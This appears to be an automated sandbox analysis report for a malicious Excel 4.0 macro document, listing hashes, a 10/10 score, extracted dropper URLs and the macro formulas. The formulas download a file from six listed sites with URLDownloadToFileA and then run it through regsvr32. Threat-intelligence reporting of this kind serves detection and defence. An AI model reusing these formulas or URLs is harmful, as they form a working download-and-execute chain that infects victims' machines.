General

  • Target

    3c7fc2390f3824378a3810fed0d4b03cb92ad0a86767d93fe3254d0ce085a5b8

  • Size

    40KB

  • Sample

    241120-ffqr4swmbm

  • MD5

    35a076de00c462a21a3ce41cd6f8e157

  • SHA1

    469238c912cc7ad7516ebdda19684e9da75d277c

  • SHA256

    3c7fc2390f3824378a3810fed0d4b03cb92ad0a86767d93fe3254d0ce085a5b8

  • SHA512

    f970e43c8a55181993d9771ee4ce1bb9f040bf2de3853286c66a45925465bb958f82d531165b14399351a2214f64398d06edfd53af106734f6a73aff8483a5fa

  • SSDEEP

    768:a/omdH+DOevZCwttqyKfcrND59V+L9Rw4eWrXcTqZ0VP2HLp:2omdH+DoylND59V4jwmXc2CVCF

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://vipteck.com/wp-content/M/

https://shofarshoshanna.com/t0ssm/roE/

https://santacruzam.com/wp-admin/FeDgNEP/

https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/

https://kingspointresidence.com/camelia-diamond_/G/

https://rockadile.nl/blogs/36DlPQKwRR1vOFQR/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vipteck.com/wp-content/M/","..\aew.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://shofarshoshanna.com/t0ssm/roE/","..\aew.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://santacruzam.com/wp-admin/FeDgNEP/","..\aew.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/","..\aew.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://kingspointresidence.com/camelia-diamond_/G/","..\aew.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rockadile.nl/blogs/36DlPQKwRR1vOFQR/","..\aew.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aew.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://vipteck.com/wp-content/M/

xlm40.dropper

https://shofarshoshanna.com/t0ssm/roE/

xlm40.dropper

https://santacruzam.com/wp-admin/FeDgNEP/

xlm40.dropper

https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/

xlm40.dropper

https://kingspointresidence.com/camelia-diamond_/G/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://vipteck.com/wp-content/M/

xlm40.dropper

https://shofarshoshanna.com/t0ssm/roE/

xlm40.dropper

https://santacruzam.com/wp-admin/FeDgNEP/

xlm40.dropper

https://thearkrealmproject.com/wp-admin/wxB4Wp3KyEMCsZva/

Targets

    • Target

      3c7fc2390f3824378a3810fed0d4b03cb92ad0a86767d93fe3254d0ce085a5b8

    • Size

      40KB

    • MD5

      35a076de00c462a21a3ce41cd6f8e157

    • SHA1

      469238c912cc7ad7516ebdda19684e9da75d277c

    • SHA256

      3c7fc2390f3824378a3810fed0d4b03cb92ad0a86767d93fe3254d0ce085a5b8

    • SHA512

      f970e43c8a55181993d9771ee4ce1bb9f040bf2de3853286c66a45925465bb958f82d531165b14399351a2214f64398d06edfd53af106734f6a73aff8483a5fa

    • SSDEEP

      768:a/omdH+DOevZCwttqyKfcrND59V+L9Rw4eWrXcTqZ0VP2HLp:2omdH+DoylND59V4jwmXc2CVCF

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks